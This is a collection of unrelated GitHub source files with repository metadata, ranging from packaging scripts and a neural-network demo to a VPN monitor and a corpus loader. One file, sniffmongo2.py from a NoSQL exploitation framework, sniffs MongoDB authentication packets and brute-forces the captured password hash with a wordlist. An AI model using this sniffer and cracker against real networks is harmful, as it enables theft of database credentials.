        return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose)
    except NotThisMethod:
        pass

    try:
        root = os.path.realpath(__file__)
        # versionfile_source is the relative path from the source-tree root
        # (where .git might live) to this file; invert it to find the root.
        for _ in cfg.versionfile_source.split("/"):
            root = os.path.dirname(root)
    except NameError:
        return {
            "version": "0+unknown",
            "full-revisionid": None,
            "dirty": None,
            "error": "unable to find root of source tree",
            "date": None,
        }

    try:
        return render(git_pieces_from_vcs(cfg.tag_prefix, root, verbose), cfg.style)
    except NotThisMethod:
        pass

    try:
        if cfg.parentdir_prefix:
            return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
    except NotThisMethod:
        pass

    return {
        "version": "0+unknown",
        "full-revisionid": None,
        "dirty": None,
        "error": "unable to compute version",
        "date": None,
    }
| {
"content_hash": "0a495a5749afbf13565ecafcd59208f0",
"timestamp": "",
"source": "github",
"line_count": 547,
"max_line_length": 88,
"avg_line_length": 32.89579524680073,
"alnum_prop": 0.5689674335889741,
"repo_name": "csdms/bmi-python",
"id": "4cfe5bf7c555eb6f4e9c330ea2ddb997b0cdd727",
"size": "18468",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bmipy/_version.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2339"
},
{
"name": "Python",
"bytes": "114175"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from solo.admin import SingletonModelAdmin
from . import models
admin.site.register(models.SiteConfiguration, SingletonModelAdmin)
| {
"content_hash": "d373bc4af6f66fff61e69de65093d006",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 66,
"avg_line_length": 33,
"alnum_prop": 0.8545454545454545,
"repo_name": "Arlefreak/ApiArlefreak",
"id": "b7876eba61c0b0f2ddc5dff3b0a6c9a89b68a55b",
"size": "165",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web_client/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "64132"
}
],
"symlink_target": ""
} |
import popen2
import os
def explainStatus(statusCode):
    """Describe a wait()-style status code as 'exit N' or 'signal N'.

    The low byte carries the terminating signal number (0 when the process
    exited normally); the high byte carries the exit code.
    """
    signal_num = statusCode & 0xFF
    if signal_num:
        return 'signal %d' % signal_num
    return 'exit %d' % (statusCode >> 8)
# Directories whose listings are captured concurrently (Python 2 script).
repos = ['/etc', '/proc', '/var']
# launch 3 async calls:
# Each Popen3 runs 'ls -l <repo>' through the shell, redirecting all output
# to <basename>.log; the processes run concurrently.
procs = [popen2.Popen3(r'ls -l %s > %s.log 2>&1'%(repo,repo.lstrip('/'))) for repo in repos]
# wait.
# wait() blocks per process and returns the raw wait()-style status code.
stats = [proc.wait() for proc in procs]
# check for results:
for k, v in zip(repos, [explainStatus(stat) for stat in stats]):
    print k, v
# THIS IS NOT BACKGROUND! THERE IS NO WAY IN PYTHON 2.2!
| {
"content_hash": "9aac68a7aacf3194c726a213441c5d5b",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 92,
"avg_line_length": 28.9,
"alnum_prop": 0.629757785467128,
"repo_name": "aclisp/large-scale",
"id": "cc2142ed7b17ffb88a4add29ab24846a473d5b7e",
"size": "601",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aprlab/exampleBackground22.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "913"
},
{
"name": "C",
"bytes": "5141993"
},
{
"name": "C++",
"bytes": "1756184"
},
{
"name": "CSS",
"bytes": "12830"
},
{
"name": "Java",
"bytes": "28931"
},
{
"name": "Objective-C",
"bytes": "11541"
},
{
"name": "Python",
"bytes": "3656"
},
{
"name": "Shell",
"bytes": "2157"
}
],
"symlink_target": ""
} |
"""ann.py: Experiments with neural networks"""
import numpy as np
from scipy import optimize
# Whole Class with additions:
class NeuralNetwork(object):
    """A fixed 2-2-1 feed-forward network with sigmoid activations."""

    def __init__(self):
        # Hyperparameters: fixed 2-input, 2-hidden, 1-output topology.
        self.inputLayerSize = 2
        self.outputLayerSize = 1
        self.hiddenLayerSize = 2
        # Weights (parameters), randomly initialised.
        self.W1 = np.random.randn(self.inputLayerSize, self.hiddenLayerSize)
        self.W2 = np.random.randn(self.hiddenLayerSize, self.outputLayerSize)

    def forward(self, X):
        """Propagate inputs through the network and return predictions."""
        # Intermediate activations are cached for costFunctionPrime().
        self.z2 = np.dot(X, self.W1)
        self.a2 = self.sigmoid(self.z2)
        self.z3 = np.dot(self.a2, self.W2)
        return self.sigmoid(self.z3)

    def sigmoid(self, z):
        """Element-wise logistic function (scalar, vector or matrix)."""
        return 1 / (1 + np.exp(-z))

    def sigmoidPrime(self, z):
        """Derivative of the logistic function."""
        return np.exp(-z) / ((1 + np.exp(-z)) ** 2)

    def costFunction(self, X, y):
        """Half squared-error cost using the weights stored on the instance."""
        self.yHat = self.forward(X)
        return 0.5 * sum((y - self.yHat) ** 2)

    def costFunctionPrime(self, X, y):
        """Gradients of the cost with respect to W1 and W2."""
        self.yHat = self.forward(X)
        delta3 = np.multiply(-(y - self.yHat), self.sigmoidPrime(self.z3))
        dJdW2 = np.dot(self.a2.T, delta3)
        delta2 = np.dot(delta3, self.W2.T) * self.sigmoidPrime(self.z2)
        dJdW1 = np.dot(X.T, delta2)
        return dJdW1, dJdW2

    # ---- helpers for the optimiser ----
    def getParams(self):
        """W1 and W2 unrolled into a single flat vector."""
        return np.concatenate((self.W1.ravel(), self.W2.ravel()))

    def setParams(self, params):
        """Set W1 and W2 from a single flat parameter vector."""
        split = self.hiddenLayerSize * self.inputLayerSize
        self.W1 = np.reshape(params[:split],
                             (self.inputLayerSize, self.hiddenLayerSize))
        stop = split + self.hiddenLayerSize * self.outputLayerSize
        self.W2 = np.reshape(params[split:stop],
                             (self.hiddenLayerSize, self.outputLayerSize))

    def computeGradients(self, X, y):
        """Gradients of both weight matrices as one flat vector."""
        dJdW1, dJdW2 = self.costFunctionPrime(X, y)
        return np.concatenate((dJdW1.ravel(), dJdW2.ravel()))
class NNTrainer(object):
    """Fits a network's weights with scipy's BFGS optimiser."""

    def __init__(self, N):
        # Keep a local reference to the network being trained.
        self.N = N

    def callbackF(self, params):
        """Record the cost after every optimiser iteration."""
        self.N.setParams(params)
        self.J.append(self.N.costFunction(self.X, self.y))

    def costFunctionWrapper(self, params, X, y):
        """Adapter handing scipy a (cost, gradient) pair for *params*."""
        self.N.setParams(params)
        return self.N.costFunction(X, y), self.N.computeGradients(X, y)

    def train(self, X, y):
        """Run BFGS (up to 200 iterations) on (X, y) and store the result."""
        # Stash the training data for the per-iteration callback.
        self.X = X
        self.y = y
        self.J = []  # cost history, one entry per iteration
        initial = self.N.getParams()
        _res = optimize.minimize(self.costFunctionWrapper, initial, jac=True,
                                 method='BFGS',
                                 args=(X, y),
                                 options={'maxiter': 200, 'disp': True},
                                 callback=self.callbackF)
        self.N.setParams(_res.x)
        self.optimizationResults = _res
if __name__ == '__main__':
    # Train the network to approximate logical OR over the four 2-bit inputs.
    X = np.array(([0, 0], [0, 1], [1, 0], [1, 1]), dtype=float)
    y = np.array(([0], [1], [1], [1]), dtype=float)
    nn = NeuralNetwork()
    # Predictions before training (random weights); Python 2 print statement.
    print nn.forward(X)
    nt = NNTrainer(nn)
    nt.train(X, y)
    #print [int(round(x)) for x in nn.forward(X)]
    # Predictions after BFGS training.
    print nn.forward(X)
| {
"content_hash": "38a21b8a8e1815ab48c44bb5d49d057f",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 77,
"avg_line_length": 31.34710743801653,
"alnum_prop": 0.5792248879514896,
"repo_name": "DrigerG/IIITB-ML",
"id": "41052c279ecb9ffa784fcc90094432117fe4519b",
"size": "3816",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "experiments/ann/ann.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Julia",
"bytes": "4775"
},
{
"name": "Python",
"bytes": "147004"
}
],
"symlink_target": ""
} |
class FixQueue(list):
    """A list-backed FIFO that never grows beyond a fixed size.

    Appending beyond capacity silently evicts the oldest element.
    """

    def __init__(self, queue_size):
        self.queue_size = queue_size
        print ("Initializing - FixQueue (Queue Size : %s) " % (self.queue_size))

    def append(self, data):
        """Append *data*, evicting the oldest entry once over capacity."""
        list.append(self, data)
        if len(self) > self.queue_size:
            del self[0]

    def clear(self):
        """Empty the queue in place."""
        del self[:]

    def pop(self, index=0):
        """Remove and return the element at *index* (the oldest by default)."""
        value = self[index]
        del self[index]
        return value
| {
"content_hash": "541ebcf5f518769a520255e35b271a8f",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 74,
"avg_line_length": 19.3,
"alnum_prop": 0.6373056994818653,
"repo_name": "minoku/FixQueue",
"id": "2c9bfafa7a3ad08ecddc883cb297ab9cccb402e6",
"size": "387",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "FixQueue/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1512"
}
],
"symlink_target": ""
} |
"""
None
"""
"""
The read4 API is already defined for you.
@param buf, a list of characters
@return an integer
def read4(buf):
# Below is an example of how the read4 API can be called.
file = File("abcdefghijk") # File is "abcdefghijk", initially file pointer (fp) points to 'a'
buf = [' '] * 4 # Create buffer with enough space to store characters
read4(buf) # read4 returns 4. Now buf = ['a','b','c','d'], fp points to 'e'
read4(buf) # read4 returns 4. Now buf = ['e','f','g','h'], fp points to 'i'
read4(buf) # read4 returns 3. Now buf = ['i','j','k',...], fp points to end of file
"""
class Solution:
    def read(self, buf, n):
        """Read up to n characters into buf using the read4 API.

        :type buf: Destination buffer (List[str])
        :type n: Number of characters to read (int)
        :rtype: The number of actual characters read (int)
        """
        total = 0
        chunk = [''] * 4
        while total < n:
            got = read4(chunk)
            # Copy at most the characters actually read, stopping at n.
            for ch in chunk[:got]:
                if total == n:
                    break
                buf[total] = ch
                total += 1
            if got < 4:
                # Fewer than 4 characters returned: end of file.
                break
        return total
| {
"content_hash": "fbf8bd1e86407e0ea3c6d117f4923776",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 93,
"avg_line_length": 28.525,
"alnum_prop": 0.5205959684487291,
"repo_name": "franklingu/leetcode-solutions",
"id": "8798c606e9cab7902fb3c09ddfe39e7c4d8d9502",
"size": "1141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "questions/read-n-characters-given-read4/Solution.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "8919"
},
{
"name": "Java",
"bytes": "173033"
},
{
"name": "Python",
"bytes": "996874"
},
{
"name": "Shell",
"bytes": "2559"
}
],
"symlink_target": ""
} |
"""
raven.contrib.django.raven_compat.middleware.wsgi
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from raven.contrib.django.middleware.wsgi import * # NOQA
| {
"content_hash": "3bfd2780b3b26c8e72fddefd2e916619",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 75,
"avg_line_length": 29.1,
"alnum_prop": 0.6185567010309279,
"repo_name": "collective/mr.poe",
"id": "e8cb865edf45189571f95203a6902c96a47e9227",
"size": "291",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "raven/contrib/django/raven_compat/middleware/wsgi.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "285308"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
# Local module
from .structure import Chain, Atom
from .PDB import PDB
# Conditional import
try:
import MDAnalysis
except ImportError:
IS_MDANALYSIS = False
else:
IS_MDANALYSIS = True
# Create the __all__ keyword according to the conditional import
__all__ = ['chains_from_files']
if IS_MDANALYSIS:
__all__ += ['chains_from_trajectory']
def chains_from_files(path_list):
    """Yield (comment, chain) pairs for every chain in every PDB file."""
    for pdb_name in path_list:
        for chain in PDB(pdb_name).get_chains():
            # Build a human-readable origin comment for this chain.
            parts = [pdb_name]
            if chain.model:
                parts.append("model %s" % (chain.model))
            if chain.name:
                parts.append("chain %s" % (chain.name))
            yield " | ".join(parts), chain
def chains_from_trajectory(trajectory, topology):
    """Yield (comment, structure) pairs, one per frame of the trajectory."""
    universe = MDAnalysis.Universe(topology, trajectory)
    selection = universe.select_atoms("backbone")
    # Build the structure once from the backbone selection...
    structure = Chain()
    for md_atom in selection:
        structure.add_atom(Atom.read_from_xtc(md_atom))
    for timestep in universe.trajectory:
        # ...then only refresh its coordinates for each frame.
        structure.set_coordinates(selection.positions)
        yield "%s | frame %s" % (trajectory, timestep.frame), structure
| {
"content_hash": "930e63af62188fa719470dd3e842835e",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 64,
"avg_line_length": 27.21153846153846,
"alnum_prop": 0.6303886925795052,
"repo_name": "jbarnoud/PBxplore",
"id": "570523acf5f462dde78f16811bc5cf0f0c7f3ec5",
"size": "1463",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pbxplore/structure/loader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "114180"
},
{
"name": "Shell",
"bytes": "10784"
}
],
"symlink_target": ""
} |
from swgpy.object import *
# SWG object-template boilerplate: builds the shared_malkloc_hue intangible
# pet template; custom tweaks belong between the modification markers.
def create(kernel):
	result = Intangible()
	result.template = "object/intangible/pet/shared_malkloc_hue.iff"
	result.attribute_template_id = -1
	result.stfName("","")
	#### BEGIN MODIFICATIONS ####
	#### END MODIFICATIONS ####
return result | {
"content_hash": "43eff905f6675612aefdb7f4a065ff24",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 65,
"avg_line_length": 21.46153846153846,
"alnum_prop": 0.6774193548387096,
"repo_name": "obi-two/Rebelion",
"id": "62faa4006940ce57a79561e06ea578c730ea30ba",
"size": "424",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/intangible/pet/shared_malkloc_hue.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
from setuptools import setup
# Packaging metadata for the aiogremlin driver.
# NOTE(review): long_description reads README.txt at build time, so the
# script must run from the project root; install_requires pins exact versions.
setup(
    name="aiogremlin",
    version="0.1.0",
    url="",
    license="MIT",
    author="davebshow",
    author_email="davebshow@gmail.com",
    description="Python 3 driver for TP3 Gremlin Server built on Asyncio and aiohttp",
    long_description=open("README.txt").read(),
    packages=["aiogremlin", "tests"],
    install_requires=[
        "aiohttp==0.16.5",
        "aiowebsocketclient==0.0.3"
    ],
    test_suite="tests",
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3 :: Only'
    ]
)
| {
"content_hash": "fe06a001be970101acd1040b9a32daf6",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 86,
"avg_line_length": 29.896551724137932,
"alnum_prop": 0.5963091118800461,
"repo_name": "platinummonkey/trolliusgremlin",
"id": "57496da39ab1fa20f3e649c1ca8eb555b7e585ba",
"size": "867",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "39448"
}
],
"symlink_target": ""
} |
"""Setup file for our unittest demo application"""
from setuptools import setup
if __name__ == "__main__":
    # Version comes from SCM tags via setuptools-scm; "no-guess-dev"
    # presumably avoids guessing the next version on untagged commits --
    # see setuptools-scm's version_scheme docs to confirm.
    setup(use_scm_version={"version_scheme": "no-guess-dev"})
| {
"content_hash": "9a1112d7b4245d943aaaca937d22adbe",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 61,
"avg_line_length": 28.5,
"alnum_prop": 0.6666666666666666,
"repo_name": "blue-yonder/pyscaffold",
"id": "53084423a135aabb6588bf0692e3029017bfbbb1",
"size": "193",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/demoapp_data/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "321819"
},
{
"name": "Shell",
"bytes": "4793"
}
],
"symlink_target": ""
} |
import re
import subprocess
import time
import sys
from location import Location
from measurement import ipsec_status, restart_ipsec
from notifier import pusher
from settings import PROWL_NOTIFY_API_KEYS, CHECK_INTERVAL, SENDGRID_API_KEY
def check_settings():
    """Validate that the required notification API keys are configured.

    Returns True when both PROWL_NOTIFY_API_KEYS and SENDGRID_API_KEY are
    non-empty; otherwise prints the failing check and returns False
    (the original fell through returning None, which callers treat the
    same way in boolean context).
    """
    try:
        assert len(PROWL_NOTIFY_API_KEYS) > 0, "NO PROWL_NOTIFY_API_KEYS is set."
        assert len(SENDGRID_API_KEY) > 0, "NO SENDGRID_API_KEY is set."
        return True
    except AssertionError as e:
        # str(e) instead of the deprecated e.message (removed in Python 3);
        # print(...) with one argument works on both Python 2 and 3.
        print(str(e))
        return False
def check_all_locations(locations):
    """fping every location's IP once and return fping's raw output."""
    try:
        targets = [location.ip for location in locations]
        proc = subprocess.Popen(['fping'] + targets, stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        output, err = proc.communicate(b"input data that is passed to subprocess' stdin")
        return output
    except OSError as e:
        # fping missing or not executable: push a notification instead of
        # crashing the monitor loop.
        pusher.push('Check All Locations', str(e))
def main():
    """Poll every location with fping forever; restart IPSec after a
    sustained multi-site outage and notify via mail/push."""
    # Matches "<ip> ... alive|unreachable" lines from fping's output.
    status_regex = re.compile("(\d+\.\d+\.\d+\.\d+).*?(alive|unreachable)")
    locations = [
        Location('Basel', '192.168.81.1', 'basel@physio-zentrum.ch'),
        Location('St.Gallen', '192.168.129.1', 'stgallen@physio-zentrum.ch'),
        Location('Wetzikon', '172.16.6.1', 'wetzikon@physio-zentrum.ch'),
        Location('Server', '192.168.70.5', 'remo@liebi.net')
    ]
    restarted = False
    # Counts consecutive polls with >= 3 sites down.
    downtime_counter = 0
    while True:
        down_connections = []
        result = status_regex.findall(check_all_locations(locations))
        for i in range(len(result)):
            ip = result[i][0]
            reply = result[i][1]
            # Resolve the Location object matching this IP (Python 2 .next()).
            location = (item for item in locations if item.ip == ip).next()
            if reply == 'unreachable':
                down_connections.append(location)
                location.check_location(False)
            else:
                location.check_location(True)
        if len(down_connections) >= 3:
            downtime_counter += 1
            # Only restart once, after 4 consecutive bad polls.
            if not restarted and downtime_counter == 4:
                message = """ Hallo. <p>Es gab ein Problem mit den Verbindungen mit mehreren Standorten</p>
            <p>({down})</p>
            Der Server wird nun automatisch neu gestartet.
            Dies kann dazu führen, dass Simed kurzzeitig unterbrochen wird.
            Sorry für die umstände.<br/><br/>
            Lieber Gruss
            Remo
            <br/><br/><br/>
            ===<br/>
            {locations}
            """.format(locations='<br/>'.join([i.get_connection_phrase() for i in locations]),
                       down=','.join([i.name for i in down_connections]))
                pusher.send_mail(locations, "Neustart", message)
                pusher.push('trying to restart the l2tp service in 60 seconds',
                            '{} Connections are down!({})'.format(len(down_connections),
                                                                  ', '.join([i.name for i in down_connections])),
                            2)
                ipsec_status()
                time.sleep(60)
                restart_ipsec()
                restarted = True
            # While still down, log the IPSec status every 6th poll.
            if restarted and downtime_counter % 6 == 0:
                ipsec_status()
        elif restarted:
            # Connections recovered after a restart: reset state and notify.
            restarted = False
            pusher.push('IPSec seems to be running again.',
                        ','.join([i.get_connection_phrase() for i in locations]))
            downtime_counter = 0
        time.sleep(CHECK_INTERVAL)
# Entry point: with no arguments run the monitor loop; with 'testmail'
# send a test e-mail instead (Python 2 print statements throughout).
if __name__ == '__main__':
    if len(sys.argv) == 1:
        if check_settings():
            print 'starting script'
            main()
        else:
            print 'failed loading settings. please check your vpn_checker.conf' \
                ' and settings.py or that the env variables are set correctly!'
    else:
        for arg in sys.argv:
            if arg == '__main__.py':
                pass
            if arg == 'testmail':
                # Send a throwaway mail to verify the SendGrid configuration.
                l = Location('testlocation', '', 'remo@liebi.net')
                pusher.send_mail(l, 'TestMail', 'TestMail')
                print 'TestMail sent.'
print 'TestMail sent.' | {
"content_hash": "14b00d40e78c1b0ad047ddab58403570",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 113,
"avg_line_length": 36.6283185840708,
"alnum_prop": 0.5332205846822904,
"repo_name": "rliebi/physio_vpn_checker",
"id": "5ec65b9d29a2e8d3b7dc3fe71d9a8e4752b90b6f",
"size": "4167",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/__main__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19148"
}
],
"symlink_target": ""
} |
from scapy.all import *
import re
import hashlib
from termcolor import colored
import os
md5 = hashlib.md5
def get_packets(port, iface, count):
    """Capture *count* packets on *iface*, filtered to the given port."""
    bpf_filter = "port " + str(port)
    return sniff(filter=bpf_filter, count=count, iface=str(iface))
def parse_packets(port, iface, count):
    """Sniff packets and try to extract a MongoDB auth triple from them.

    Returns (user, nonce, key, flag); flag is 1 when a packet containing
    the token "key" was found and fields were extracted, else 0 (with the
    other fields left empty).

    NOTE(review): indexes 4/6/8 into the alphanumeric-token list assume a
    fixed MongoDB authenticate-message layout -- confirm against a capture.
    """
    packets=""
    packet=""
    user=""
    nonce=""
    key=""
    packets = get_packets(port, iface, count)
    # Find the first packet whose payload tokens include "key" (Python 2 xrange).
    for i in xrange(len(packets)):
        if "key" in re.findall(r'[A-Za-z0-9]{3,}', str(packets[i])):
            packet=packets[i]
            break
    if(len(packet)>=8):
        # Tokens 4, 6 and 8 of the alphanumeric runs hold nonce, user, key.
        nonce = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[4]
        user = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[6]
        key = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[8]
        flag=1
        return user, nonce, key,flag
    else:
        flag=0
        return user, nonce, key,flag
def gen_pass(user, nonce, passw):
    """Compute the MONGODB-CR client key: md5(nonce + user + md5(user + ":mongo:" + password)).

    Strings are encoded explicitly before hashing so this works on both
    Python 2 (where the original passed str objects straight to md5) and
    Python 3 (where hashlib requires bytes).
    """
    digest = hashlib.md5((user + ":mongo:" + str(passw)).encode("utf-8")).hexdigest()
    return hashlib.md5((nonce + user + digest).encode("utf-8")).hexdigest()
def sniff_mongo():
    # Sniff MongoDB auth traffic on eth0:27017, then dictionary-attack the
    # captured MONGODB-CR digest using ./dictionary/b.txt.
    print colored("[-] Sniff packages...",'blue')
    print colored("[-] Parse packages...",'yellow')
    user, nonce, key, flag = parse_packets("27017", "eth0", 10)
    while True:
        # Keep re-sniffing until parse_packets reports a usable capture (flag==1).
        if flag==1:
            print colored("[-] Sniff Completed \n",'green');
            print colored("Prepair to brute...",'green')
            # NOTE(review): os.getcwd() result is discarded -- this call is a no-op.
            os.getcwd()
            try:
                # NOTE(review): the handle is never closed and the name 'file'
                # shadows the Python 2 builtin.
                file_len = open('./dictionary/b.txt')
                file = file_len.readlines()
                for i in file:
                    # Each wordlist line is expected to look like "<x>:<password>";
                    # strip the newline, then take the part after the first ':'.
                    # NOTE(review): a line without ':' raises IndexError here.
                    new=i.split('\n')[0]
                    passw=new.split(':')[1]
                    #passw = file.readline().split('\n')[0]
                    if gen_pass(user, nonce, passw) == key:
                        print colored("\nFound - "+user+":"+passw,'green')
                        break
            except IOError:
                print colored("[-] Plse provide file name to brute force",'red')
            # Exit the sniff loop whether or not a password was found.
            break
        else:
            user, nonce, key, flag = parse_packets("27017", "eth0", 10)
| {
"content_hash": "d77ba3372cecb4ec2d260dcab7d6df0a",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 87,
"avg_line_length": 27.063492063492063,
"alnum_prop": 0.6205278592375366,
"repo_name": "torque59/Nosql-Exploitation-Framework",
"id": "a76eaedd89a32a472bb6b5a2ea0562b41e686d71",
"size": "1705",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "sniff/sniffmongo2.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "83133"
},
{
"name": "Shell",
"bytes": "355"
}
],
"symlink_target": ""
} |
__author__ = 'liam'
from flask_login import UserMixin
from flask import session
from .. import db
from ..helpers.google_helper import get_plus_profile
class User(db.Model, UserMixin):
    """SQLAlchemy user model keyed on a Google+ account.

    Columns:
        id          -- auto-increment primary key
        google_id   -- Google account identifier (nullable)
        google_data -- pickled Google+ profile payload
    """
    id = db.Column(db.Integer, primary_key=True)
    google_id = db.Column(db.Unicode(40), nullable=True)
    google_data = db.Column(db.PickleType)

    def __init__(self, uid, data):
        self.google_id = uid
        self.google_data = data

    def _asdict(self):
        # Minimal dict form exposed for serialization; only the primary key.
        return dict(id=self.id)

    def is_authenticated(self):
        """Return True only when the session holds credentials for this user.

        Bugfix: uses ``session.get`` so a missing 'credentials'/'gplus_id' key
        means "not authenticated" instead of raising KeyError on fresh sessions
        (the original indexed the session directly).
        """
        if session.get(u'credentials') is None:
            return False
        # NOTE(review): this compares the session's Google plus id against the
        # DB primary key ``self.id``; ``self.google_id`` looks like the intended
        # operand -- confirm before relying on this check.
        if session.get(u'gplus_id') != self.id:
            return False
        return True

    @classmethod
    def get_user(cls, gid, credentials):
        """Return the user with ``google_id == gid``, creating and persisting it
        from the fetched Google+ profile when it does not exist yet."""
        u = User.query.filter_by(google_id=gid).scalar()
        if u is None:
            result = get_plus_profile(gid, credentials)
            u = User(gid, result)
            db.session.add(u)
            db.session.commit()
        return u
| {
"content_hash": "f8dbf65b842419379af3bcae5ad9e9b3",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 56,
"avg_line_length": 27.416666666666668,
"alnum_prop": 0.601823708206687,
"repo_name": "OldGermanTrick/oldgermantrick",
"id": "a50b34dec1557186336c0447400e2a6fb8dcaa38",
"size": "987",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oldgermantrick/models/user.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "48834"
},
{
"name": "HTML",
"bytes": "11976"
},
{
"name": "JavaScript",
"bytes": "141003"
},
{
"name": "Python",
"bytes": "22908"
}
],
"symlink_target": ""
} |
"""
Corpus loading worker
---------------------
"""
from __future__ import annotations
import multiprocessing as mp
import os
from queue import Empty, Queue
from typing import Dict, Optional, Union
import sqlalchemy
import sqlalchemy.engine
from sqlalchemy.orm import Session
from montreal_forced_aligner.corpus.classes import FileData
from montreal_forced_aligner.corpus.helper import find_exts
from montreal_forced_aligner.db import File, SoundFile, Speaker, SpeakerOrdering, Utterance
from montreal_forced_aligner.dictionary.multispeaker import MultispeakerSanitizationFunction
from montreal_forced_aligner.exceptions import SoundFileError, TextGridParseError, TextParseError
from montreal_forced_aligner.helper import mfa_open
from montreal_forced_aligner.utils import Counter, Stopped
__all__ = ["AcousticDirectoryParser", "CorpusProcessWorker", "Job"]
class AcousticDirectoryParser(mp.Process):
    """
    Worker for processing directories for acoustic sound files
    Parameters
    ----------
    corpus_directory: str
        Directory to parse
    job_queue: Queue
        Queue to add file names to
    audio_directory: str
        Directory with additional audio files
    stopped: :class:`~montreal_forced_aligner.utils.Stopped`
        Check for whether to exit early
    finished_adding: :class:`~montreal_forced_aligner.utils.Stopped`
        Check to set when the parser is done adding files to the queue
    file_counts: :class:`~montreal_forced_aligner.utils.Counter`
        Counter for the number of total files that the parser has found
    """
    def __init__(
        self,
        corpus_directory: str,
        job_queue: Queue,
        audio_directory: str,
        stopped: Stopped,
        finished_adding: Stopped,
        file_counts: Counter,
    ):
        mp.Process.__init__(self)
        self.corpus_directory = corpus_directory
        self.job_queue = job_queue
        self.audio_directory = audio_directory
        self.stopped = stopped
        self.finished_adding = finished_adding
        self.file_counts = file_counts
    def run(self) -> None:
        """
        Run the corpus loading job

        Walks ``corpus_directory`` (and ``audio_directory`` when given), putting
        one ``(file_name, wav_path, transcription_path, relative_path)`` tuple
        per usable file onto ``job_queue``, then signals ``finished_adding``.
        """
        use_audio_directory = False
        all_sound_files = {}
        if self.audio_directory and os.path.exists(self.audio_directory):
            # A separate audio directory was supplied: index every sound file in
            # it once up front.  wav files are updated last so they take
            # precedence over other audio formats for the same identifier.
            use_audio_directory = True
            for root, _, files in os.walk(self.audio_directory, followlinks=True):
                exts = find_exts(files)
                wav_files = {k: os.path.join(root, v) for k, v in exts.wav_files.items()}
                other_audio_files = {
                    k: os.path.join(root, v) for k, v in exts.other_audio_files.items()
                }
                all_sound_files.update(other_audio_files)
                all_sound_files.update(wav_files)
        for root, _, files in os.walk(self.corpus_directory, followlinks=True):
            exts = find_exts(files)
            relative_path = root.replace(self.corpus_directory, "").lstrip("/").lstrip("\\")
            if self.stopped.stop_check():
                break
            if not use_audio_directory:
                # No external audio directory: sound files sit next to their
                # transcriptions, so rebuild the index per corpus folder.
                all_sound_files = {}
                exts.wav_files = {k: os.path.join(root, v) for k, v in exts.wav_files.items()}
                exts.other_audio_files = {
                    k: os.path.join(root, v) for k, v in exts.other_audio_files.items()
                }
                all_sound_files.update(exts.other_audio_files)
                all_sound_files.update(exts.wav_files)
            for file_name in exts.identifiers:
                if self.stopped.stop_check():
